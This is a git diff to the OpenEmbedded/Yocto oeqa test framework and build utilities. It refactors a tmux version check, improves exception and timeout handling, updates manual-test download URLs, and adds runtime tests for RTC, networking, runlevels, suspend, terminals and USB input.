attach_cmd = 'tmux att -t {0}'.format(window_name)
@@ -253,13 +262,18 @@ def spawn(name, sh_cmd, title=None, env=None, d=None):
except OSError:
return
+def check_tmux_version(desired):
+ vernum = check_terminal_version("tmux")
+ if vernum and LooseVersion(vernum) < desired:
+ return False
+ return vernum
+
def check_tmux_pane_size(tmux):
import subprocess as sub
# On older tmux versions (<1.9), return false. The reason
# is that there is no easy way to get the height of the active panel
# on current window without nested formats (available from version 1.9)
- vernum = check_terminal_version("tmux")
- if vernum and LooseVersion(vernum) < '1.9':
+ if not check_tmux_version('1.9'):
return False
try:
p = sub.Popen('%s list-panes -F "#{?pane_active,#{pane_height},}"' % tmux,
diff --git a/meta/lib/oe/utils.py b/meta/lib/oe/utils.py
index 13f4271da0..3e016244c5 100644
--- a/meta/lib/oe/utils.py
+++ b/meta/lib/oe/utils.py
@@ -193,7 +193,7 @@ def parallel_make(d, makeinst=False):
return int(v)
- return None
+ return ''
def parallel_make_argument(d, fmt, limit=None, makeinst=False):
"""
@@ -481,7 +481,8 @@ class ThreadedWorker(Thread):
try:
func(self, *args, **kargs)
except Exception as e:
- print(e)
+ # Eat all exceptions
+ bb.mainlogger.debug("Worker task raised %s" % e, exc_info=e)
finally:
self.tasks.task_done()
diff --git a/meta/lib/oeqa/core/case.py b/meta/lib/oeqa/core/case.py
index aae451fef2..bc4446a938 100644
--- a/meta/lib/oeqa/core/case.py
+++ b/meta/lib/oeqa/core/case.py
@@ -43,8 +43,13 @@ class OETestCase(unittest.TestCase):
clss.tearDownClassMethod()
def _oeSetUp(self):
- for d in self.decorators:
- d.setUpDecorator()
+ try:
+ for d in self.decorators:
+ d.setUpDecorator()
+ except:
+ for d in self.decorators:
+ d.tearDownDecorator()
+ raise
self.setUpMethod()
def _oeTearDown(self):
diff --git a/meta/lib/oeqa/core/decorator/oetimeout.py b/meta/lib/oeqa/core/decorator/oetimeout.py
index df90d1c798..5e6873ad48 100644
--- a/meta/lib/oeqa/core/decorator/oetimeout.py
+++ b/meta/lib/oeqa/core/decorator/oetimeout.py
@@ -24,5 +24,6 @@ class OETimeout(OETestDecorator):
def tearDownDecorator(self):
signal.alarm(0)
- signal.signal(signal.SIGALRM, self.alarmSignal)
- self.logger.debug("Removed SIGALRM handler")
+ if hasattr(self, 'alarmSignal'):
+ signal.signal(signal.SIGALRM, self.alarmSignal)
+ self.logger.debug("Removed SIGALRM handler")
diff --git a/meta/lib/oeqa/core/target/ssh.py b/meta/lib/oeqa/core/target/ssh.py
index aefb576805..832b6216f6 100644
--- a/meta/lib/oeqa/core/target/ssh.py
+++ b/meta/lib/oeqa/core/target/ssh.py
@@ -34,6 +34,7 @@ class OESSHTarget(OETarget):
self.timeout = timeout
self.user = user
ssh_options = [
+ '-o', 'HostKeyAlgorithms=+ssh-rsa',
'-o', 'UserKnownHostsFile=/dev/null',
'-o', 'StrictHostKeyChecking=no',
'-o', 'LogLevel=ERROR'
@@ -225,6 +226,9 @@ def SSHCall(command, logger, timeout=None, **opts):
endtime = time.time() + timeout
except InterruptedError:
continue
+ except BlockingIOError:
+ logger.debug('BlockingIOError')
+ continue
# process hasn't returned yet
if not eof:
diff --git a/meta/lib/oeqa/core/tests/cases/timeout.py b/meta/lib/oeqa/core/tests/cases/timeout.py
index 5dfecc7b7c..69cf969a67 100644
--- a/meta/lib/oeqa/core/tests/cases/timeout.py
+++ b/meta/lib/oeqa/core/tests/cases/timeout.py
@@ -8,6 +8,7 @@ from time import sleep
from oeqa.core.case import OETestCase
from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.decorator.depends import OETestDepends
class TimeoutTest(OETestCase):
@@ -19,3 +20,15 @@ class TimeoutTest(OETestCase):
def testTimeoutFail(self):
sleep(2)
self.assertTrue(True, msg='How is this possible?')
+
+
+ def testTimeoutSkip(self):
+ self.skipTest("This test needs to be skipped, so that testTimeoutDepends()'s OETestDepends kicks in")
+
+ @OETestDepends(["timeout.TimeoutTest.testTimeoutSkip"])
+ @OETimeout(3)
+ def testTimeoutDepends(self):
+ self.assertTrue(False, msg='How is this possible?')
+
+ def testTimeoutUnrelated(self):
+ sleep(6)
diff --git a/meta/lib/oeqa/core/tests/test_decorators.py b/meta/lib/oeqa/core/tests/test_decorators.py
index b798bf7d33..5095f39948 100755
--- a/meta/lib/oeqa/core/tests/test_decorators.py
+++ b/meta/lib/oeqa/core/tests/test_decorators.py
@@ -133,5 +133,11 @@ class TestTimeoutDecorator(TestBase):
msg = "OETestTimeout didn't restore SIGALRM"
self.assertIs(alarm_signal, signal.getsignal(signal.SIGALRM), msg=msg)
+ def test_timeout_cancel(self):
+ tests = ['timeout.TimeoutTest.testTimeoutSkip', 'timeout.TimeoutTest.testTimeoutDepends', 'timeout.TimeoutTest.testTimeoutUnrelated']
+ msg = 'Unrelated test failed to complete'
+ tc = self._testLoader(modules=self.modules, tests=tests)
+ self.assertTrue(tc.runTests().wasSuccessful(), msg=msg)
+
if __name__ == '__main__':
unittest.main()
diff --git a/meta/lib/oeqa/manual/eclipse-plugin.json b/meta/lib/oeqa/manual/eclipse-plugin.json
index d77d0e673b..6c110d0656 100644
--- a/meta/lib/oeqa/manual/eclipse-plugin.json
+++ b/meta/lib/oeqa/manual/eclipse-plugin.json
@@ -44,7 +44,7 @@
"expected_results": ""
},
"2": {
- "action": "wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/qemu (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
+ "action": "wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/ (ex:core-image-sato-sdk-qemux86-date-rootfs-tar-bz2) \nsource /opt/poky/version/environment-setup-i585-poky-linux \n\nExtract qemu with runqemu-extract-sdk /home/user/file(ex.core-image-sato-sdk-qemux86.bz2) \n/home/user/qemux86-sato-sdk \n\n",
"expected_results": " Qemu can be lauched normally."
},
"3": {
@@ -60,7 +60,7 @@
"expected_results": ""
},
"6": {
- "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget autobuilder.yoctoproject.org/pub/releases//machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
+ "action": "(d) QEMU: \nSelect this option if you will be using the QEMU emulator. Specify the Kernel matching the QEMU architecture you are using. \n wget https://downloads.yoctoproject.org/releases/yocto/yocto-$VERSION/machines/qemu/qemux86/bzImage-qemux86.bin \n e.g: /home/$USER/yocto/adt-installer/download_image/bzImage-qemux86.bin \n\n",
"expected_results": ""
},
"7": {
@@ -247,7 +247,7 @@
"execution": {
"1": {
"action": "Clone eclipse-poky source. \n \n - git clone git://git.yoctoproject.org/eclipse-poky \n\n",
- "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on http://autobuilder.yoctoproject.org/pub/releases/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
+ "expected_results": "Eclipse plugin is successfully installed \n\nDocumentation is there. For example if you have release yocto-2.0.1 you will found on https://downloads.yoctoproject.org/releases/yocto/yocto-2.0.1/eclipse-plugin/mars/ archive with documentation like org.yocto.doc-development-$date.zip \n \n"
},
"2": {
"action": "Checkout correct tag. \n\n - git checkout <eclipse-version>/<yocto-version> \n\n",
diff --git a/meta/lib/oeqa/manual/oe-core.json b/meta/lib/oeqa/manual/oe-core.json
index fb47c5ec36..4ad524d89b 100644
--- a/meta/lib/oeqa/manual/oe-core.json
+++ b/meta/lib/oeqa/manual/oe-core.json
@@ -80,7 +80,7 @@
"expected_results": ""
},
"7": {
- "action": "Run command:./configure && make ",
+ "action": "Run command:./configure ${CONFIGUREOPTS} && make ",
"expected_results": "Verify that \"matchbox-desktop\" binary file was created successfully under \"src/\" directory "
},
"8": {
diff --git a/meta/lib/oeqa/manual/toaster-managed-mode.json b/meta/lib/oeqa/manual/toaster-managed-mode.json
index 12374c7c64..9566d9d10e 100644
--- a/meta/lib/oeqa/manual/toaster-managed-mode.json
+++ b/meta/lib/oeqa/manual/toaster-managed-mode.json
@@ -136,7 +136,7 @@
"expected_results": ""
},
"3": {
- "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
+ "action": "Check that default values are as follows: \n\tDISTRO - poky \n\tIMAGE_FSTYPES - ext3 jffs2 tar.bz2 \n\tIMAGE_INSTALL_append - \"Not set\" \n\tPACKAGE_CLASSES - package_rpm \n SSTATE_DIR - /homeDirectory/poky/sstate-cache \n\n",
"expected_results": ""
},
"4": {
diff --git a/meta/lib/oeqa/runtime/cases/date.py b/meta/lib/oeqa/runtime/cases/date.py
index fdd2a6ae58..bd6537400e 100644
--- a/meta/lib/oeqa/runtime/cases/date.py
+++ b/meta/lib/oeqa/runtime/cases/date.py
@@ -13,12 +13,12 @@ class DateTest(OERuntimeTestCase):
def setUp(self):
if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
self.logger.debug('Stopping systemd-timesyncd daemon')
- self.target.run('systemctl disable --now systemd-timesyncd')
+ self.target.run('systemctl disable --now --runtime systemd-timesyncd')
def tearDown(self):
if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
self.logger.debug('Starting systemd-timesyncd daemon')
- self.target.run('systemctl enable --now systemd-timesyncd')
+ self.target.run('systemctl enable --now --runtime systemd-timesyncd')
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['coreutils', 'busybox'])
@@ -28,14 +28,13 @@ class DateTest(OERuntimeTestCase):
self.assertEqual(status, 0, msg=msg)
oldDate = output
- sampleDate = '"2016-08-09 10:00:00"'
- (status, output) = self.target.run("date -s %s" % sampleDate)
+ sampleTimestamp = 1488800000
+ (status, output) = self.target.run("date -s @%d" % sampleTimestamp)
self.assertEqual(status, 0, msg='Date set failed, output: %s' % output)
- (status, output) = self.target.run("date -R")
- p = re.match('Tue, 09 Aug 2016 10:00:.. \+0000', output)
+ (status, output) = self.target.run('date +"%s"')
msg = 'The date was not set correctly, output: %s' % output
- self.assertTrue(p, msg=msg)
+ self.assertTrue(int(output) - sampleTimestamp < 300, msg=msg)
(status, output) = self.target.run('date -s "%s"' % oldDate)
msg = 'Failed to reset date, output: %s' % output
diff --git a/meta/lib/oeqa/runtime/cases/df.py b/meta/lib/oeqa/runtime/cases/df.py
index 89fd0fb901..bb155c9cf9 100644
--- a/meta/lib/oeqa/runtime/cases/df.py
+++ b/meta/lib/oeqa/runtime/cases/df.py
@@ -4,12 +4,14 @@
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfDataVar, skipIfInDataVar
from oeqa.runtime.decorator.package import OEHasPackage
class DfTest(OERuntimeTestCase):
@OETestDepends(['ssh.SSHTest.test_ssh'])
@OEHasPackage(['coreutils', 'busybox'])
+ @skipIfInDataVar('IMAGE_FEATURES', 'read-only-rootfs', 'Test case df requires a writable rootfs')
def test_df(self):
cmd = "df -P / | sed -n '2p' | awk '{print $4}'"
(status,output) = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
new file mode 100644
index 0000000000..e010612838
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/ethernet_ip_connman.py
@@ -0,0 +1,36 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+
+class Ethernet_Test(OERuntimeTestCase):
+
+ def set_ip(self, x):
+ x = x.split(".")
+ sample_host_address = '150'
+ x[3] = sample_host_address
+ x = '.'.join(x)
+ return x
+
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_set_virtual_ip(self):
+ (status, output) = self.target.run("ifconfig eth0 | grep 'inet ' | awk '{print $2}'")
+ self.assertEqual(status, 0, msg='Failed to get ip address. Make sure you have an ethernet connection on your device, output: %s' % output)
+ original_ip = output
+ virtual_ip = self.set_ip(original_ip)
+
+ (status, output) = self.target.run("ifconfig eth0:1 %s netmask 255.255.255.0 && sleep 2 && ping -c 5 %s && ifconfig eth0:1 down" % (virtual_ip,virtual_ip))
+ self.assertEqual(status, 0, msg='Failed to create virtual ip address, output: %s' % output)
+
+ @OETestDepends(['ethernet_ip_connman.Ethernet_Test.test_set_virtual_ip'])
+ def test_get_ip_from_dhcp(self):
+ (status, output) = self.target.run("connmanctl services | grep -E '*AO Wired|*AR Wired' | awk '{print $3}'")
+ self.assertEqual(status, 0, msg='No wired interfaces are detected, output: %s' % output)
+ wired_interfaces = output
+
+ (status, output) = self.target.run("ip route | grep default | awk '{print $3}'")
+ self.assertEqual(status, 0, msg='Failed to retrieve the default gateway, output: %s' % output)
+ default_gateway = output
+
+ (status, output) = self.target.run("connmanctl config %s --ipv4 dhcp && sleep 2 && ping -c 5 %s" % (wired_interfaces,default_gateway))
+ self.assertEqual(status, 0, msg='Failed to get dynamic IP address via DHCP in connmand, output: %s' % output) \ No newline at end of file
diff --git a/meta/lib/oeqa/runtime/cases/ksample.py b/meta/lib/oeqa/runtime/cases/ksample.py
index a9a1620ebd..9883aa9aa8 100644
--- a/meta/lib/oeqa/runtime/cases/ksample.py
+++ b/meta/lib/oeqa/runtime/cases/ksample.py
@@ -10,7 +10,7 @@ from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
# need some kernel fragments
-# echo "KERNEL_FEATURES_append += \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
+# echo "KERNEL_FEATURES_append = \" features\/kernel\-sample\/kernel\-sample.scc\"" >> local.conf
class KSample(OERuntimeTestCase):
def cmd_and_check(self, cmd='', match_string=''):
status, output = self.target.run(cmd)
diff --git a/meta/lib/oeqa/runtime/cases/ltp.py b/meta/lib/oeqa/runtime/cases/ltp.py
index a66d5d13d7..879f2a673c 100644
--- a/meta/lib/oeqa/runtime/cases/ltp.py
+++ b/meta/lib/oeqa/runtime/cases/ltp.py
@@ -67,7 +67,7 @@ class LtpTest(LtpTestBase):
def runltp(self, ltp_group):
cmd = '/opt/ltp/runltp -f %s -p -q -r /opt/ltp -l /opt/ltp/results/%s -I 1 -d /opt/ltp' % (ltp_group, ltp_group)
starttime = time.time()
- (status, output) = self.target.run(cmd)
+ (status, output) = self.target.run(cmd, timeout=1200)
endtime = time.time()
with open(os.path.join(self.ltptest_log_dir, "%s-raw.log" % ltp_group), 'w') as f:
diff --git a/meta/lib/oeqa/runtime/cases/pam.py b/meta/lib/oeqa/runtime/cases/pam.py
index 271a1943e3..a482ded945 100644
--- a/meta/lib/oeqa/runtime/cases/pam.py
+++ b/meta/lib/oeqa/runtime/cases/pam.py
@@ -8,11 +8,14 @@
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.depends import OETestDepends
from oeqa.core.decorator.data import skipIfNotFeature
+from oeqa.runtime.decorator.package import OEHasPackage
class PamBasicTest(OERuntimeTestCase):
@skipIfNotFeature('pam', 'Test requires pam to be in DISTRO_FEATURES')
@OETestDepends(['ssh.SSHTest.test_ssh'])
+ @OEHasPackage(['shadow'])
+ @OEHasPackage(['shadow-base'])
def test_pam(self):
status, output = self.target.run('login --help')
msg = ('login command does not work as expected. '
diff --git a/meta/lib/oeqa/runtime/cases/parselogs.py b/meta/lib/oeqa/runtime/cases/parselogs.py
index a1791b5cca..1cac59725d 100644
--- a/meta/lib/oeqa/runtime/cases/parselogs.py
+++ b/meta/lib/oeqa/runtime/cases/parselogs.py
@@ -32,7 +32,7 @@ common_errors = [
"Failed to load module \"fbdev\"",
"Failed to load module fbdev",
"Failed to load module glx",
- "[drm] Cannot find any crtc or sizes - going 1024x768",
+ "[drm] Cannot find any crtc or sizes",
"_OSC failed (AE_NOT_FOUND); disabling ASPM",
"Open ACPI failed (/var/run/acpid.socket) (No such file or directory)",
"NX (Execute Disable) protection cannot be enabled: non-PAE kernel!",
@@ -61,6 +61,8 @@ common_errors = [
"[rdrand]: Initialization Failed",
"[pulseaudio] authkey.c: Failed to open cookie file",
"[pulseaudio] authkey.c: Failed to load authentication key",
+ "was skipped because of a failed condition check",
+ "was skipped because all trigger condition checks failed",
]
video_related = [
@@ -88,6 +90,9 @@ qemux86_common = [
'tsc: HPET/PMTIMER calibration failed',
"modeset(0): Failed to initialize the DRI2 extension",
"glamor initialization failed",
+ "blk_update_request: I/O error, dev fd0, sector 0 op 0x0:(READ)",
+ "floppy: error",
+ 'failed to IDENTIFY (I/O error, err_mask=0x4)',
] + common_errors
ignore_errors = {
@@ -293,7 +298,7 @@ class ParseLogsTest(OERuntimeTestCase):
grepcmd = 'grep '
grepcmd += '-Ei "'
for error in errors:
- grepcmd += '\<' + error + '\>' + '|'
+ grepcmd += r'\<' + error + r'\>' + '|'
grepcmd = grepcmd[:-1]
grepcmd += '" ' + str(log) + " | grep -Eiv \'"
@@ -304,13 +309,13 @@ class ParseLogsTest(OERuntimeTestCase):
errorlist = ignore_errors['default']
for ignore_error in errorlist:
- ignore_error = ignore_error.replace('(', '\(')
- ignore_error = ignore_error.replace(')', '\)')
+ ignore_error = ignore_error.replace('(', r'\(')
+ ignore_error = ignore_error.replace(')', r'\)')
ignore_error = ignore_error.replace("'", '.')
- ignore_error = ignore_error.replace('?', '\?')
- ignore_error = ignore_error.replace('[', '\[')
- ignore_error = ignore_error.replace(']', '\]')
- ignore_error = ignore_error.replace('*', '\*')
+ ignore_error = ignore_error.replace('?', r'\?')
+ ignore_error = ignore_error.replace('[', r'\[')
+ ignore_error = ignore_error.replace(']', r'\]')
+ ignore_error = ignore_error.replace('*', r'\*')
ignore_error = ignore_error.replace('0-9', '[0-9]')
grepcmd += ignore_error + '|'
grepcmd = grepcmd[:-1]
diff --git a/meta/lib/oeqa/runtime/cases/ping.py b/meta/lib/oeqa/runtime/cases/ping.py
index f6603f75ec..498f80d0a5 100644
--- a/meta/lib/oeqa/runtime/cases/ping.py
+++ b/meta/lib/oeqa/runtime/cases/ping.py
@@ -6,6 +6,7 @@ from subprocess import Popen, PIPE
from oeqa.runtime.case import OERuntimeTestCase
from oeqa.core.decorator.oetimeout import OETimeout
+from oeqa.core.exception import OEQATimeoutError
class PingTest(OERuntimeTestCase):
@@ -13,14 +14,17 @@ class PingTest(OERuntimeTestCase):
def test_ping(self):
output = ''
count = 0
- while count < 5:
- cmd = 'ping -c 1 %s' % self.target.ip
- proc = Popen(cmd, shell=True, stdout=PIPE)
- output += proc.communicate()[0].decode('utf-8')
- if proc.poll() == 0:
- count += 1
- else:
- count = 0
+ try:
+ while count < 5:
+ cmd = 'ping -c 1 %s' % self.target.ip
+ proc = Popen(cmd, shell=True, stdout=PIPE)
+ output += proc.communicate()[0].decode('utf-8')
+ if proc.poll() == 0:
+ count += 1
+ else:
+ count = 0
+ except OEQATimeoutError:
+ self.fail("Ping timeout error for address %s, count %s, output: %s" % (self.target.ip, count, output))
msg = ('Expected 5 consecutive, got %d.\n'
'ping output is:\n%s' % (count,output))
self.assertEqual(count, 5, msg = msg)
diff --git a/meta/lib/oeqa/runtime/cases/ptest.py b/meta/lib/oeqa/runtime/cases/ptest.py
index ef0470da7e..2066d009c3 100644
--- a/meta/lib/oeqa/runtime/cases/ptest.py
+++ b/meta/lib/oeqa/runtime/cases/ptest.py
@@ -104,4 +104,5 @@ class PtestRunnerTest(OERuntimeTestCase):
failmsg = failmsg + "Failed ptests:\n%s" % pprint.pformat(failed_tests)
if failmsg:
+ self.logger.warning("There were failing ptests.")
self.fail(failmsg)
diff --git a/meta/lib/oeqa/runtime/cases/rpm.py b/meta/lib/oeqa/runtime/cases/rpm.py
index 8e18b426f8..203fcc8505 100644
--- a/meta/lib/oeqa/runtime/cases/rpm.py
+++ b/meta/lib/oeqa/runtime/cases/rpm.py
@@ -49,21 +49,20 @@ class RpmBasicTest(OERuntimeTestCase):
msg = 'status: %s. Cannot run rpm -qa: %s' % (status, output)
self.assertEqual(status, 0, msg=msg)
- def check_no_process_for_user(u):
- _, output = self.target.run(self.tc.target_cmds['ps'])
- if u + ' ' in output:
- return False
- else:
- return True
+ def wait_for_no_process_for_user(u, timeout = 120):
+ timeout_at = time.time() + timeout
+ while time.time() < timeout_at:
+ _, output = self.target.run(self.tc.target_cmds['ps'])
+ if u + ' ' not in output:
+ return
+ time.sleep(1)
+ user_pss = [ps for ps in output.split("\n") if u + ' ' in ps]
+ msg = "User %s has processes still running: %s" % (u, "\n".join(user_pss))
+ self.fail(msg=msg)
def unset_up_test_user(u):
# ensure no test1 process in running
- timeout = time.time() + 30
- while time.time() < timeout:
- if check_no_process_for_user(u):
- break
- else:
- time.sleep(1)
+ wait_for_no_process_for_user(u)
status, output = self.target.run('userdel -r %s' % u)
msg = 'Failed to erase user: %s' % output
self.assertTrue(status == 0, msg=msg)
@@ -141,13 +140,4 @@ class RpmInstallRemoveTest(OERuntimeTestCase):
self.tc.target.run('rm -f %s' % self.dst)
- # if using systemd this should ensure all entries are flushed to /var
- status, output = self.target.run("journalctl --sync")
- # Get the amount of entries in the log file
- status, output = self.target.run(check_log_cmd)
- msg = 'Failed to get the final size of the log file.'
- self.assertEqual(0, status, msg=msg)
- # Check that there's enough of them
- self.assertGreaterEqual(int(output), 80,
- 'Cound not find sufficient amount of rpm entries in /var/log/messages, found {} entries'.format(output))
diff --git a/meta/lib/oeqa/runtime/cases/rtc.py b/meta/lib/oeqa/runtime/cases/rtc.py
new file mode 100644
index 0000000000..39f4d29f23
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/rtc.py
@@ -0,0 +1,40 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfFeature
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import re
+
+class RTCTest(OERuntimeTestCase):
+
+ def setUp(self):
+ if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+ self.logger.debug('Stopping systemd-timesyncd daemon')
+ self.target.run('systemctl disable --now --runtime systemd-timesyncd')
+
+ def tearDown(self):
+ if self.tc.td.get('VIRTUAL-RUNTIME_init_manager') == 'systemd':
+ self.logger.debug('Starting systemd-timesyncd daemon')
+ self.target.run('systemctl enable --now --runtime systemd-timesyncd')
+
+ @skipIfFeature('read-only-rootfs',
+ 'Test does not work with read-only-rootfs in IMAGE_FEATURES')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ @OEHasPackage(['coreutils', 'busybox'])
+ def test_rtc(self):
+ (status, output) = self.target.run('hwclock -r')
+ self.assertEqual(status, 0, msg='Failed to get RTC time, output: %s' % output)
+
+ (status, current_datetime) = self.target.run('date +"%m%d%H%M%Y"')
+ self.assertEqual(status, 0, msg='Failed to get system current date & time, output: %s' % current_datetime)
+
+ example_datetime = '062309452008'
+ (status, output) = self.target.run('date %s ; hwclock -w ; hwclock -r' % example_datetime)
+ check_hwclock = re.search('2008-06-23 09:45:..', output)
+ self.assertTrue(check_hwclock, msg='The RTC time was not set correctly, output: %s' % output)
+
+ (status, output) = self.target.run('date %s' % current_datetime)
+ self.assertEqual(status, 0, msg='Failed to reset system date & time, output: %s' % output)
+
+ (status, output) = self.target.run('hwclock -w')
+ self.assertEqual(status, 0, msg='Failed to reset RTC time, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/runlevel.py b/meta/lib/oeqa/runtime/cases/runlevel.py
new file mode 100644
index 0000000000..3a4df8ace1
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/runlevel.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+
+import time
+
+class RunLevel_Test(OERuntimeTestCase):
+
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_runlevel_3(self):
+ (status, output) = self.target.run("init 3 && sleep 5 && runlevel")
+ runlevel= '5 3'
+ self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 3, current runlevel : %s' % output[-1])
+ (status, output) = self.target.run("uname -a")
+ self.assertEqual(status, 0, msg='Failed to run uname command, output: %s' % output)
+
+ @OETestDepends(['runlevel.RunLevel_Test.test_runlevel_3'])
+ def test_runlevel_5(self):
+ (status, output) = self.target.run("init 5 && sleep 5 && runlevel")
+ runlevel = '3 5'
+ self.assertEqual(output, runlevel, msg='Failed to set current runlevel to runlevel 5, current runlevel : %s' % output[-1])
+ (status, output) = self.target.run('export DISPLAY=:0 && x11perf -aa10text')
+ self.assertEqual(status, 0, msg='Failed to run 2D graphic test, output: %s' % output)
diff --git a/meta/lib/oeqa/runtime/cases/scp.py b/meta/lib/oeqa/runtime/cases/scp.py
index 3a5f292152..f2bbc947d6 100644
--- a/meta/lib/oeqa/runtime/cases/scp.py
+++ b/meta/lib/oeqa/runtime/cases/scp.py
@@ -23,7 +23,7 @@ class ScpTest(OERuntimeTestCase):
os.remove(cls.tmp_path)
@OETestDepends(['ssh.SSHTest.test_ssh'])
- @OEHasPackage(['openssh-scp', 'dropbear'])
+ @OEHasPackage(['openssh-scp'])
def test_scp_file(self):
dst = '/tmp/test_scp_file'
diff --git a/meta/lib/oeqa/runtime/cases/suspend.py b/meta/lib/oeqa/runtime/cases/suspend.py
new file mode 100644
index 0000000000..67b6f7e56f
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/suspend.py
@@ -0,0 +1,33 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+import threading
+import time
+
+class Suspend_Test(OERuntimeTestCase):
+
+ def test_date(self):
+ (status, output) = self.target.run('date')
+ self.assertEqual(status, 0, msg = 'Failed to run date command, output : %s' % output)
+
+ def test_ping(self):
+ t_thread = threading.Thread(target=self.target.run, args=("ping 8.8.8.8",))
+ t_thread.start()
+ time.sleep(2)
+
+ status, output = self.target.run('pidof ping')
+ self.target.run('kill -9 %s' % output)
+ self.assertEqual(status, 0, msg = 'Not able to find process that runs ping, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ self.assertEqual(status, 0, msg = 'Failed to suspend the system to RAM, output : %s' % output)
+
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_suspend(self):
+ self.test_date()
+ self.test_ping()
+ self.set_suspend()
+ self.test_date()
+ self.test_ping()
diff --git a/meta/lib/oeqa/runtime/cases/terminal.py b/meta/lib/oeqa/runtime/cases/terminal.py
new file mode 100644
index 0000000000..8fcca99f47
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/terminal.py
@@ -0,0 +1,21 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import threading
+import time
+
+class TerminalTest(OERuntimeTestCase):
+
+ @OEHasPackage(['matchbox-terminal'])
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_terminal_running(self):
+ t_thread = threading.Thread(target=self.target.run, args=("export DISPLAY=:0 && matchbox-terminal -e 'sh -c \"uname -a && exec sh\"'",))
+ t_thread.start()
+ time.sleep(2)
+
+ status, output = self.target.run('pidof matchbox-terminal')
+ number_of_terminal = len(output.split())
+ self.assertEqual(number_of_terminal, 1, msg='There should be only one terminal launched. Number of terminals launched: %s' % number_of_terminal)
+ self.target.run('kill -9 %s' % output)
+ self.assertEqual(status, 0, msg='Not able to find process that runs terminal.')
diff --git a/meta/lib/oeqa/runtime/cases/usb_hid.py b/meta/lib/oeqa/runtime/cases/usb_hid.py
new file mode 100644
index 0000000000..3c292cf661
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/usb_hid.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+from oeqa.runtime.decorator.package import OEHasPackage
+
+class USB_HID_Test(OERuntimeTestCase):
+
+ def keyboard_mouse_simulation(self):
+ (status, output) = self.target.run('export DISPLAY=:0 && xdotool key F2 && xdotool mousemove 100 100')
+ return self.assertEqual(status, 0, msg = 'Failed to simulate keyboard/mouse input event, output : %s' % output)
+
+ def set_suspend(self):
+ (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+ return self.assertEqual(status, 0, msg = 'Failed to suspend the system to RAM, output : %s' % output)
+
+ @OEHasPackage(['xdotool'])
+ @skipIfQemu('qemuall', 'Test only runs on real hardware')
+ @OETestDepends(['ssh.SSHTest.test_ssh'])
+ def test_USB_Hid_input(self):
+ self.keyboard_mouse_simulation()
+ self.set_suspend()
+ self.keyboard_mouse_simulation()
diff --git a/meta/lib/oeqa/runtime/context.py b/meta/lib/oeqa/runtime/context.py
index 3826f27642..8a0dbd0736 100644
--- a/meta/lib/oeqa/runtime/context.py
+++ b/meta/lib/oeqa/runtime/context.py
@@ -5,6 +5,7 @@
#
import os
+import sys
from oeqa.core.context import OETestContext, OETestContextExecutor
from oeqa.core.target.ssh import OESSHTarget
